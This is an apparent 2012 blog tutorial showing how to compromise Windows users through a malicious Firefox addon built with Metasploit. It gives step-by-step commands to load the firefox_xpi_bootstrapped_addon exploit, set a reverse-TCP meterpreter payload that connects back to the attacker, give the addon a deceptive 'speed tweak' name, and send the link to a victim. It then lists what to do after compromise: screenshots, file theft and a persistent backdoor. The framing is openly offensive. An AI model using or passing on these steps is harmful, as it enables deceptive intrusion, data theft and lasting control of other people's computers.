Tuesday, 21 August 2012

Hacking Windows using Mozilla Firefox Addon

Hey all as we know that these days users of firefox increased rapidly and also users like to use addons alot for different purposes like for removing timelines, for making firefox work more goodly. So it will be quite easy for doing social engineering and making fool to your victim.


About This Vulnerability


This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.

Things Required


Attacker's Machine --> Backtrack 5

Victim's Machine--> Windows Machine

So let's start, follow me

1. Open metasploit framework and then use exploit  firefox xpi bootstrapped addon exploit.

so our command will be use exploit/multi/browser/firefox_xpi_bootstrapped addon.

After that set your payload as per as your choice. For this tutorial i will be using windows/meterpreter/reverse_tcp.
So our command will be  set payload windows/meterpreter/reverse_tcp.

So you must get something as shown in below image

2. Ok so now our exploit and payload are set but now we need to check whether all the options are ok or not . For that use command show options  this will show us all the things necessary for doing this attack.
Now fill all the options with required things.
In my case all the required options are filled as shown in below image.






Information of the things filled-->

  set addonname tweak firefox to load faster --> eye catching name for social engineering purpose

  set srvhost xxx.xxx.xxx--> your server ip address run the exploit 

  uripath firefox-tweaker --> make the URL more friendly

  set lhost xxx.xxx.xxx--> local ip address to receive connection from victim


 3. So if everything is filled correctly then you can start your attack by using exploit command,






Now send your url to the victim in my condition the url is http://192.168,174.130:8080/firefox-tweaker.

4. Our victim will get screen something similar to the below screen.



5. Now if victim successfully installed the addon then we can use sessions -l command to see the information.


We can do many things like taking screenshots,downloading files and also we can put our backdoor for future.


I hope you all enjoyed this tutorial and if u feel any confusion or problem then you may ask in comments.

IF U LIKED THIS POST THEN PLEASE COMMENT AND PLEASE DO NOT COPY 

1 comment:

  1. Great article! We will be linking to this great article on our website.

    Keep up the good writing.

    My web blog - gold watches - westkueste-usa.de -

    ReplyDelete